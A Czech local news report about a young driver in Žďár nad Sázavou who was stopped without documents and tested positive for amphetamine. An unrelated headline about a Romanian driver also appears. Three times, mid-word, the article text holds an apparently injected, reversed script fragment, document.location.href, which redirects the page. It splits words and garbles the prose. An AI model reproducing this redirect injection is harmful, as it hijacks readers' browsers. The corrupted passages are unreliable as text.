Rainbow page separator

Mladý řidič neměl doklady, navíc řídil pod vlivem amfetaminu

Neděle, 11. listopadu 2018

Rumunský řidič přišel ve spánku o pneumatiky za bezmála milion

Žďár nad Sázavou / Devatenáctiletého šoféra osobního au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu Alfa Romeo zastavili žďárští policisté v rámci dohledu nad bezpečností a plynulostí silničního provozu v ulici Brněnská. Při kontrole se ukázalo, že řidič porušil několik zákonných ustanovení.
„Při kontrole řidič nepředložil potřebné doklady. Policisté jej vyzvali k podrobení se dechové zkoušce a testu na zjištění ovlivnění omamnými a psychotropními látkami. Dechová zkouška byla negativní, opačně [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu však bylo u testu na drogy, který vykázal pozitivní výsledek na amfetamin,“ informovala policejní mluvčí Stanislava Miláčková s tím, že lékařské vyšetření spojené s odběrem biologického materiálu mladý šofér odmítl.
Policisté mu další jízdu zakázali a vše zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali. Následně se mladík bude před příslušným správním orgánem zodpovídat z přestupků na úseku dopravy.